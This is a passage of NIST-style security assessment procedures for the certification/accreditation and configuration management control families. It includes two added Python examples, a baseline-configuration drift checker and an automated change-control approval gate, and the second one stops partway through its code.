Control: The organization develops, disseminates, and periodically reviews/updates: (i) formal, documented, security assessment and certification and accreditation policies that address purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the security assessment and certification and accreditation policies and associated assessment, certification, and accreditation controls.
Supplemental Guidance: The security assessment and certification and accreditation policies and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The security assessment and certification and accreditation policies can be included as part of the general information security policy for the organization. Security assessment and certification and accreditation procedures can be developed for the security program in general, and for a particular information system, when required. The organization defines what constitutes a significant change to the information system to achieve consistent security reaccreditations. NIST Special Publication 800-53A provides guidance on security control assessments. NIST Special Publication 800-37 provides guidance on security certification and accreditation. NIST Special Publication 800-12 provides guidance on security policies and procedures.
CA-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents security assessment and certification and accreditation policies and procedures;
(ii) the organization disseminates security assessment and certification and accreditation policies and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review policy and procedures; and
(iv) the organization updates security assessment and certification and accreditation policies and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security assessment and certification and accreditation policies and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security assessment and certification and accreditation responsibilities]. (H)
CA-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the security assessment and certification and accreditation policies address purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the security assessment and certification and accreditation policies are consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the security assessment and certification and accreditation procedures address all areas identified in the security assessment and certification and accreditation policies and address achieving policy-compliant implementations of all associated security assessment and certification and accreditation controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security assessment and certification and accreditation policies and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security assessment and certification and accreditation responsibilities]. (H)


ASSESSMENT PROCEDURE
CA-2 SECURITY ASSESSMENTS
Control: The organization conducts an assessment of the security controls in the information system [Assignment: organization-defined frequency, at least annually] to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Supplemental Guidance: This control is intended to support the FISMA requirement that the management, operational, and technical controls in each information system contained in the inventory of major information systems be assessed with a frequency depending on risk, but no less than annually. The FISMA requirement for (at least) annual security control assessments should not be interpreted by organizations as adding additional assessment requirements to those requirements already in place in the security certification and accreditation process. To satisfy the annual FISMA assessment requirement, organizations can draw upon the security control assessment results from any of the following sources, including but not limited to: (i) security certifications conducted as part of an information system accreditation or reaccreditation process (see CA-4); (ii) continuous monitoring activities (see CA-7); or (iii) testing and evaluation of the information system as part of the ongoing system development life cycle process (provided that the testing and evaluation results are current and relevant to the determination of security control effectiveness). Existing security assessment results are reused to the extent that they are still valid and are supplemented with additional assessments as needed. Reuse of assessment information is critical in achieving a broad-based, cost-effective, and fully integrated security program capable of producing the needed evidence to determine the actual security status of the information system.
OMB does not require an annual assessment of all security controls employed in an organizational information system. In accordance with OMB policy, organizations must annually assess a subset of the security controls based on: (i) the FIPS 199 security categorization of the information system; (ii) the specific security controls selected and employed by the organization to protect the information system; and (iii) the level of assurance (or confidence) that the organization must have in determining the effectiveness of the security controls in the information system. It is expected that the organization will assess all of the security controls in the information system during the three-year accreditation cycle. The organization can use the current year's assessment results obtained during security certification to meet the annual FISMA assessment requirement (see CA-4). NIST Special Publication 800-53A provides guidance on security control assessments to include reuse of existing assessment results. Related security controls: CA-4, CA-6, CA-7, SA-11.
CA-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of security control assessments and the frequency is at least annually; and
(ii) the organization conducts an assessment of the security controls in the information system at an organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Security assessment policy; procedures addressing security assessments; security plan; security assessment plan; security assessment report; assessment evidence; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
CA-3 INFORMATION SYSTEM CONNECTIONS
Control: The organization authorizes all connections from the information system to other information systems outside of the accreditation boundary through the use of system connection agreements and monitors/controls the system connections on an ongoing basis.
Supplemental Guidance: Since FIPS 199 security categorizations apply to individual information systems, the organization carefully considers the risks that may be introduced when systems are connected to other information systems with different security requirements and security controls, both within the organization and external to the organization. Risk considerations also include information systems sharing the same networks. NIST Special Publication 800-47 provides guidance on connecting information systems. Related security controls: SC-7, SA-9.
CA-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization identifies all connections to external information systems (i.e., information systems outside of the accreditation boundary);
(ii) the organization authorizes all connections from the information system to external information systems through the use of system connection agreements; and
(iii) the organization monitors/controls the system interconnections on an ongoing basis.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Access control policy; procedures addressing information system connections; NIST Special Publication 800-47; system and communications protection policy; personnel security policy; information system connection agreements; security plan; information system design documentation; information system configuration management and control documentation; security assessment report; plan of action and milestones; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with responsibility for developing, implementing, or approving information system connection agreements]. (H)


ASSESSMENT PROCEDURE
CA-4 SECURITY CERTIFICATION
Control: The organization conducts an assessment of the security controls in the information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Supplemental Guidance: A security certification is conducted by the organization in support of the [[OMB Circular A-130, Appendix III]] requirement for accrediting the information system. The security certification is a key factor in all security accreditation (i.e., authorization) decisions and is integrated into and spans the system development life cycle. The organization assesses all security controls in an information system during the initial security accreditation. Subsequent to the initial accreditation and in accordance with OMB policy, the organization assesses a subset of the controls annually during continuous monitoring (see CA-7). The organization can use the current year's assessment results obtained during security certification to meet the annual FISMA assessment requirement (see CA-2). NIST Special Publication 800-53A provides guidance on security control assessments. NIST Special Publication 800-37 provides guidance on security certification and accreditation. Related security controls: CA-2, CA-6, SA-11.
CA-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization conducts an assessment of the security controls in the information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system; and
(ii) the organization employs a security certification process in accordance with OMB policy and NIST Special Publications 800-37 and 800-53A.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security certification; security plan; security assessment plan; security assessment report; assessment evidence; plan of action and milestones; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security certification responsibilities]. (H)
CA-4(1) SECURITY CERTIFICATION
Control Enhancement:
The organization employs an independent certification agent or certification team to conduct an assessment of the security controls in the information system.
Enhancement Supplemental Guidance: An independent certification agent or certification team is any individual or group capable of conducting an impartial assessment of an organizational information system. Impartiality implies that the assessors are free from any perceived or actual conflicts of interest with respect to the developmental, operational, and/or management chain of command associated with the information system or to the determination of security control effectiveness. Independent security certification services can be obtained from other elements within the organization or can be contracted to a public or private sector entity outside of the organization. Contracted certification services are considered independent if the information system owner is not directly involved in the contracting process or cannot unduly influence the independence of the certification agent or certification team conducting the assessment of the security controls in the information system. The authorizing official decides on the required level of certifier independence based on the criticality and sensitivity of the information system and the ultimate risk to organizational operations and organizational assets, and to individuals. The authorizing official determines if the level of certifier independence is sufficient to provide confidence that the assessment results produced are sound and can be used to make a credible, risk-based decision. 
In special situations, for example when the organization that owns the information system is small or the organizational structure requires that the assessment of the security controls be accomplished by individuals that are in the developmental, operational, and/or management chain of the system owner or authorizing official, independence in the certification process can be achieved by ensuring the assessment results are carefully reviewed and analyzed by an independent team of experts to validate the completeness, consistency, and veracity of the results. The authorizing official should consult with the Office of the Inspector General, the senior agency information security officer, and the chief information officer to fully discuss the implications of any decisions on certifier independence in the types of special circumstances described above.
CA-4(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs an independent certification agent or certification team to conduct an assessment of the security controls in the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security certification; security accreditation package (including security plan, security assessment report, plan of action and milestones, authorization statement); other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
CA-5 PLAN OF ACTION AND MILESTONES
Control: The organization develops and updates [Assignment: organization-defined frequency], a plan of action and milestones for the information system that documents the organization's planned, implemented, and evaluated remedial actions to correct deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system.
Supplemental Guidance: The plan of action and milestones is a key document in the security accreditation package developed for the authorizing official and is subject to federal reporting requirements established by OMB. The plan of action and milestones updates are based on the findings from security control assessments, security impact analyses, and continuous monitoring activities. OMB FISMA reporting guidance contains instructions regarding organizational plans of action and milestones. NIST Special Publication 800-37 provides guidance on the security certification and accreditation of information systems. NIST Special Publication 800-30 provides guidance on risk mitigation.
CA-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops a plan of action and milestones for the information system;
(ii) the plan of action and milestones documents the planned, implemented, and evaluated remedial actions by the organization to correct deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system;
(iii) the organization defines in the security plan, explicitly or by reference, the frequency of plan of action and milestone updates; and
(iv) the organization updates the plan of action and milestones at an organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing plan of action and milestones; security plan; security assessment plan; security assessment report; assessment evidence; plan of action and milestones; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with plan of action and milestones development and implementation responsibilities]. (H)


ASSESSMENT PROCEDURE
CA-6 SECURITY ACCREDITATION
Control: The organization authorizes (i.e., accredits) the information system for processing before operations and updates the authorization [Assignment: organization-defined frequency, at least every three years] or when there is a significant change to the system. A senior organizational official signs and approves the security accreditation.
Supplemental Guidance: [[OMB Circular A-130, Appendix III]], establishes policy for security accreditations of federal information systems. The organization assesses the security controls employed within the information system before and in support of the security accreditation. Security assessments conducted in support of security accreditations are called security certifications. The security accreditation of an information system is not a static process. Through the employment of a comprehensive continuous monitoring process (the fourth and final phase of the certification and accreditation process), the critical information contained in the accreditation package (i.e., the system security plan, the security assessment report, and the plan of action and milestones) is updated on an ongoing basis providing the authorizing official and the information system owner with an up-to-date status of the security state of the information system. To reduce the administrative burden of the three-year reaccreditation process, the authorizing official uses the results of the ongoing continuous monitoring process to the maximum extent possible as the basis for rendering a reaccreditation decision. NIST Special Publication 800-37 provides guidance on the security certification and accreditation of information systems. Related security controls: CA-2, CA-4, CA-7.
CA-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of authorization updates, not to exceed three years;
(ii) the organization authorizes (i.e., accredits) the information system for processing before operations and updates the authorization at an organization-defined frequency or when there is a significant change to the information system;
(iii) a senior organizational official signs and approves the security accreditation; and
(iv) the security accreditation process employed by the organization is consistent with NIST Special Publication 800-37.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing security accreditation; NIST Special Publication 800-37; security accreditation package (including security plan; security assessment report; plan of action and milestones; authorization statement); other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security accreditation responsibilities]. (H)


ASSESSMENT PROCEDURE
CA-7 CONTINUOUS MONITORING
Control: The organization monitors the security controls in the information system on an ongoing basis.
Supplemental Guidance: Continuous monitoring activities include configuration management and control of information system components, security impact analyses of changes to the system, ongoing assessment of security controls, and status reporting. The organization assesses all security controls in an information system during the initial security accreditation. Subsequent to the initial accreditation and in accordance with OMB policy, the organization assesses a subset of the controls annually during continuous monitoring. The selection of an appropriate subset of security controls is based on: (i) the FIPS 199 security categorization of the information system; (ii) the specific security controls selected and employed by the organization to protect the information system; and (iii) the level of assurance (or grounds for confidence) that the organization must have in determining the effectiveness of the security controls in the information system. The organization establishes the selection criteria and subsequently selects a subset of the security controls employed within the information system for assessment. The organization also establishes the schedule for control monitoring to ensure adequate coverage is achieved. Those security controls that are volatile or critical to protecting the information system are assessed at least annually. All other controls are assessed at least once during the information system's three-year accreditation cycle. The organization can use the current year's assessment results obtained during continuous monitoring to meet the annual FISMA assessment requirement (see CA-2).
This control is closely related to and mutually supportive of the activities required in monitoring configuration changes to the information system. An effective continuous monitoring program results in ongoing updates to the information system security plan, the security assessment report, and the plan of action and milestones—the three principal documents in the security accreditation package. A rigorous and well-executed continuous monitoring process significantly reduces the level of effort required for the reaccreditation of the information system. NIST Special Publication 800-37 provides guidance on the continuous monitoring process. NIST Special Publication 800-53A provides guidance on the assessment of security controls. Related security controls: CA-2, CA-4, CA-5, CA-6, CM-4.
CA-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization monitors the security controls in the information system on an ongoing basis; and
(ii) the organization employs a security control monitoring process consistent with NIST Special Publications 800-37 and 800-53A.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; NIST Special Publications 800-37 and 800-53A; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities]. (H)
CA-7.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization conducts security impact analyses on changes to the information system;
(ii) the organization documents and reports changes to or deficiencies in the security controls employed in the information system; and
(iii) the organization makes adjustments to the information system security plan and plan of action and milestones, as appropriate, based on the activities associated with continuous monitoring of the security controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities]. (M) (H)
CA-7(1) CONTINUOUS MONITORING
Control Enhancement:
The organization employs an independent certification agent or certification team to monitor the security controls in the information system on an ongoing basis.
Enhancement Supplemental Guidance: The organization can extend and maximize the value of the ongoing assessment of security controls during the continuous monitoring process by requiring an independent certification agent or team to assess all of the security controls during the information system's three-year accreditation cycle. Related security controls: CA-2, CA-4, CA-5, CA-6, CM-4.
CA-7(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs an independent certification agent or certification team to monitor the security controls in the information system on an ongoing basis.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Certification and accreditation policy; procedures addressing continuous monitoring of information system security controls; security plan; security assessment report; plan of action and milestones; information system monitoring records; security impact analyses; status reports; other relevant documents or records].
Interview: [SELECT FROM: Organizational personnel with continuous monitoring responsibilities].


FAMILY: Configuration Management


ASSESSMENT PROCEDURE
CM-1 CONFIGURATION MANAGEMENT POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, configuration management policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the configuration management policy and associated configuration management controls.
Supplemental Guidance: The configuration management policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The configuration management policy can be included as part of the general information security policy for the organization. Configuration management procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
CM-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents configuration management policy and procedures;
(ii) the organization disseminates configuration management policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review configuration management policy and procedures; and
(iv) the organization updates configuration management policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with configuration management and control responsibilities]. (H)
CM-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the configuration management policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the configuration management policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the configuration management procedures address all areas identified in the configuration management policy and address achieving policy-compliant implementations of all associated configuration management controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with configuration management and control responsibilities]. (H)


ASSESSMENT PROCEDURE
CM-2 BASELINE CONFIGURATION
Control: The organization develops, documents, and maintains a current baseline configuration of the information system.
Supplemental Guidance: This control establishes a baseline configuration for the information system. The baseline configuration provides information about a particular component's makeup (e.g., the standard software load for a workstation or notebook computer including updated patch information) and the component's logical placement within the information system architecture. The baseline configuration also provides the organization with a well-defined and documented specification to which the information system is built and deviations, if required, are documented in support of mission needs/objectives. The baseline configuration of the information system is consistent with the Federal Enterprise Architecture. Related security controls: CM-6, CM-8.
CM-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents a baseline configuration of the information system that is consistent with the Federal Enterprise Architecture, shows relationships among information system components, and provides a well-defined and documented specification to which the information system is built;
(ii) the organization maintains the baseline configuration; and
(iii) the organization documents deviations from the baseline configuration, in support of mission needs/objectives.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; Federal Enterprise Architecture documentation; information system design documentation; information system architecture and configuration documentation; other relevant documents or records]. (L) (M) (H)
CM-2(1) BASELINE CONFIGURATION
Control Enhancement:
The organization updates the baseline configuration of the information system as an integral part of information system component installations.
CM-2(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization updates the baseline configuration of the information system as an integral part of information system component installations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; information system architecture and configuration documentation; other relevant documents or records]. (M) (H)
CM-2(2) BASELINE CONFIGURATION
Control Enhancement:
The organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of the information system.
CM-2(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to maintain an up-to-date, complete, accurate, and readily available baseline configuration of the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing the baseline configuration of the information system; information system design documentation; information system architecture and configuration documentation; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing baseline configuration maintenance]. (H)
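As an added illustration of what CM-2(2)'s automated baseline maintenance and CM-2.1(iii)'s documented-deviation check look like when tested, the following Python compares a SHA-256 manifest of an observed system against the documented baseline manifest and reports drift that is not covered by an approved deviation record. This is example code written for this page, not NIST text and not any product's implementation; the file paths, file contents and the approved-deviation list are constructed sample data.

```python
"""Baseline configuration drift check (CM-2 / CM-2(2)). Added example, not NIST text.

The documented baseline is stored as a manifest: path -> SHA-256 of the content.
The observed system is reduced to the same form and compared; anything that
differs is drift, and drift without an approved deviation record is a finding.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass, field


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: dict[str, bytes]) -> dict[str, str]:
    """Reduce a set of files (path -> content) to path -> content hash."""
    return {path: sha256_hex(content) for path, content in files.items()}


@dataclass
class DriftReport:
    added: list[str] = field(default_factory=list)         # present, not in baseline
    removed: list[str] = field(default_factory=list)       # in baseline, missing now
    modified: list[str] = field(default_factory=list)      # content hash differs
    undocumented: list[str] = field(default_factory=list)  # drift with no approved deviation

    def is_clean(self) -> bool:
        return not (self.added or self.removed or self.modified)


def compare_to_baseline(baseline: dict[str, str], observed: dict[str, str],
                        approved_deviations: set[str]) -> DriftReport:
    """Classify every path that differs between the baseline and the observed state."""
    report = DriftReport()
    for path in sorted(set(baseline) | set(observed)):
        if path not in baseline:
            report.added.append(path)
        elif path not in observed:
            report.removed.append(path)
        elif baseline[path] != observed[path]:
            report.modified.append(path)
        else:
            continue  # unchanged
        if path not in approved_deviations:
            report.undocumented.append(path)
    return report


# Constructed sample data (not taken from any real system).
BASELINE_FILES = {
    "/etc/ssh/sshd_config": b"PermitRootLogin no\nPasswordAuthentication no\n",
    "/etc/sudoers": b"root ALL=(ALL) ALL\n",
    "/etc/motd": b"Authorized use only.\n",
}
OBSERVED_FILES = {
    "/etc/ssh/sshd_config": b"PermitRootLogin yes\nPasswordAuthentication no\n",  # weakened
    "/etc/sudoers": b"root ALL=(ALL) ALL\n",                                      # unchanged
    "/etc/cron.d/backup": b"0 2 * * * root /usr/local/bin/backup\n",            # new, approved
    # /etc/motd is gone
}
APPROVED_DEVIATIONS = {"/etc/cron.d/backup"}  # a deviation record exists for this path only

BASELINE_MANIFEST = build_manifest(BASELINE_FILES)


def run_check() -> DriftReport:
    """Compare the observed system against the documented baseline."""
    return compare_to_baseline(BASELINE_MANIFEST, build_manifest(OBSERVED_FILES),
                               APPROVED_DEVIATIONS)


if __name__ == "__main__":
    r = run_check()
    for label, paths in (("added", r.added), ("removed", r.removed),
                         ("modified", r.modified), ("UNDOCUMENTED", r.undocumented)):
        print(f"{label:12s} {paths}")
```

An assessor testing CM-2(2).1 would expect the observed manifest to be produced by the organization's own mechanism on a schedule, and would treat every path in `undocumented` as a CM-2.1(iii) finding. Content hashing rather than timestamps or sizes is what catches the one-word change in sshd_config.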


ASSESSMENT PROCEDURE
CM-3 CONFIGURATION CHANGE CONTROL
Control: The organization authorizes, documents, and controls changes to the information system.
Supplemental Guidance: The organization manages configuration changes to the information system using an organizationally approved process (e.g., a chartered Configuration Control Board). Configuration change control involves the systematic proposal, justification, implementation, test/evaluation, review, and disposition of changes to the information system, including upgrades and modifications. Configuration change control includes changes to the configuration settings for information technology products (e.g., operating systems, firewalls, routers). The organization includes emergency changes in the configuration change control process, including changes resulting from the remediation of flaws. The approvals to implement a change to the information system include successful results from the security analysis of the change. The organization audits activities associated with configuration changes to the information system. Related security controls: CM-4, CM-6, SI-2.
CM-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization authorizes, documents, and controls changes to the information system using an organizationally approved process;
(ii) the organization's configuration change control process involves the systematic proposal, justification, implementation, test/evaluation, review, and disposition of changes to the information system, including upgrades and modifications;
(iii) the organization approves changes to the information system with consideration for the results from the security impact analysis of the change; and
(iv) the organization audits activities associated with configuration changes to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing information system configuration change control; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H)
CM-3(1) CONFIGURATION CHANGE CONTROL
Control Enhancement:
The organization employs automated mechanisms to: (i) document proposed changes to the information system; (ii) notify appropriate approval authorities; (iii) highlight approvals that have not been received in a timely manner; (iv) inhibit change until necessary approvals are received; and (v) document completed changes to the information system.
CM-3(1).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs automated mechanisms to document proposed changes to the information system;
(ii) the organization employs automated mechanisms to notify appropriate approval authorities;
(iii) the organization employs automated mechanisms to highlight approvals that have not been received in a timely manner;
(iv) the organization employs automated mechanisms to inhibit change until necessary approvals are received; and
(v) the organization employs automated mechanisms to document completed changes to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing information system configuration change control; information system design documentation; information system architecture and configuration documentation; automated configuration control mechanisms; change control records; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing configuration change control]. (H)
CM-3(ICS-1) CONFIGURATION CHANGE CONTROL
ICS Control Enhancements:
The organization tests, validates, and documents changes (e.g., patches and updates) before implementing the changes on the operational ICS.
ICS Enhancement Supplemental Guidance: The organization ensures that testing does not interfere with ICS functions. The individual/group conducting the tests fully understands the organizational information security policies and procedures, the ICS security policies and procedures, and the specific health, safety, and environmental risks associated with a particular facility and/or process. A production ICS may need to be taken off-line, or replicated to the extent feasible, before testing can be conducted. If an ICS must be taken off-line for testing, the tests are scheduled to occur during planned ICS outages whenever possible. In situations where the organization cannot, for operational reasons, conduct live testing of a production ICS, the organization employs compensating controls (e.g., providing a replicated system to conduct testing) in accordance with the general tailoring guidance.
CM-3(ICS-1).1 ASSESSMENT OBJECTIVE:
Determine if the organization tests, validates, and documents changes (e.g., patches and updates) before implementing the changes on the operational ICS.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing ICS configuration change control; ICS architecture and configuration documentation; change control records; ICS audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with configuration change control responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
CM-4 MONITORING CONFIGURATION CHANGES
Control: The organization monitors changes to the information system, conducting security impact analyses to determine the effects of the changes.
Supplemental Guidance: Prior to change implementation, and as part of the change approval process, the organization analyzes changes to the information system for potential security impacts. After the information system is changed (including upgrades and modifications), the organization checks the security features to verify that the features are still functioning properly. The organization audits activities associated with configuration changes to the information system. Monitoring configuration changes and conducting security impact analyses are important elements with regard to the ongoing assessment of security controls in the information system. Related security control: CA-7.
CM-4.1 ASSESSMENT OBJECTIVE:
Determine if the organization monitors changes to the information system by verifying that the organization:
  • prior to change implementation and as part of the change approval process, conducts security impact analyses to assess the effects of the system changes;
  • after the system is changed (including upgrades and modifications), checks the security features to confirm that the features are still functioning properly; and
  • audits activities associated with configuration changes to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing the monitoring of configuration changes to the information system; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H)


ASSESSMENT PROCEDURE
CM-5 ACCESS RESTRICTIONS FOR CHANGE
Control: The organization: (i) approves individual access privileges and enforces physical and logical access restrictions associated with changes to the information system; and (ii) generates, retains, and reviews records reflecting all such changes.
Supplemental Guidance: Planned or unplanned changes to the hardware, software, and/or firmware components of the information system can have significant effects on the overall security of the system. Accordingly, only qualified and authorized individuals obtain access to information system components for purposes of initiating changes, including upgrades and modifications.
CM-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization approves individual access privileges and enforces physical and logical access restrictions associated with changes to the information system, including upgrades and modifications; and
(ii) the organization generates, retains, and reviews records reflecting all such changes to the information system.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing access restrictions for changes to the information system; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel responsible for generating, retaining, and reviewing records reflecting changes to the information system]. (M) (H)
Test: [SELECT FROM: Change control process and associated restrictions for changes to the information system]. (H)
CM-5(1) ACCESS RESTRICTIONS FOR CHANGE
Control Enhancement:
The organization employs automated mechanisms to enforce access restrictions and support auditing of the enforcement actions.
CM-5(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization employs automated mechanisms to enforce access restrictions and support auditing of the enforcement actions.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Configuration management policy; procedures addressing access restrictions for changes to the information system; information system design documentation; information system architecture and configuration documentation; change control records; information system audit records; other relevant documents or records]. (H)
Test: [SELECT FROM: Automated mechanisms implementing access restrictions for changes to the information system]. (H)
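The following Python sketch, written for this page as an illustration and not taken from NIST or any change-management product, shows the five automated functions that CM-3(1) names (document the proposal, notify approvers, highlight overdue approvals, inhibit the change until approvals are in, document completion) together with the CM-5 and CM-5(1) requirement that only approved individuals may implement a change and that every enforcement action is recorded for later review. The approver list, the implementer list, the two-day approval window and the change request walked through are all assumed sample values.

```python
"""Automated change-control gate: CM-3(1) (i)-(v) plus CM-5 change-access enforcement.
Added example for this page; not NIST text and not any product's implementation.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Assumed organization-defined values.
APPROVAL_AUTHORITIES = {"ccb-chair", "security-officer"}   # every authority must approve
AUTHORIZED_IMPLEMENTERS = {"sysadmin-a", "sysadmin-b"}     # CM-5: who may apply changes
APPROVAL_WINDOW = timedelta(days=2)                        # (iii): overdue after this


@dataclass
class ChangeRequest:
    change_id: str
    description: str
    requester: str
    submitted_at: datetime
    approvals: dict[str, datetime] = field(default_factory=dict)
    implemented_by: str | None = None
    completed_at: datetime | None = None

    def missing_approvals(self) -> set[str]:
        return APPROVAL_AUTHORITIES - set(self.approvals)


class ChangeControl:
    def __init__(self) -> None:
        self.requests: dict[str, ChangeRequest] = {}
        self.notifications: list[tuple[str, str]] = []   # (approver, change_id)
        self.audit_log: list[str] = []                   # retained record of every action

    def _record(self, when: datetime, event: str) -> None:
        self.audit_log.append(f"{when.isoformat()} {event}")

    def propose(self, change_id: str, description: str, requester: str,
                now: datetime) -> ChangeRequest:
        """(i) document the proposed change and (ii) notify the approval authorities."""
        cr = ChangeRequest(change_id, description, requester, now)
        self.requests[change_id] = cr
        self._record(now, f"PROPOSED {change_id} by {requester}: {description}")
        for approver in sorted(APPROVAL_AUTHORITIES):
            self.notifications.append((approver, change_id))
        return cr

    def approve(self, change_id: str, approver: str, now: datetime) -> bool:
        """Record an approval; reject anyone who is not an authority or who would be
        approving their own request (separation of duties)."""
        cr = self.requests[change_id]
        if approver not in APPROVAL_AUTHORITIES or approver == cr.requester:
            self._record(now, f"REJECTED approval of {change_id} by {approver}")
            return False
        cr.approvals[approver] = now
        self._record(now, f"APPROVED {change_id} by {approver}")
        return True

    def overdue(self, now: datetime) -> list[str]:
        """(iii) highlight open requests whose approvals are past the window."""
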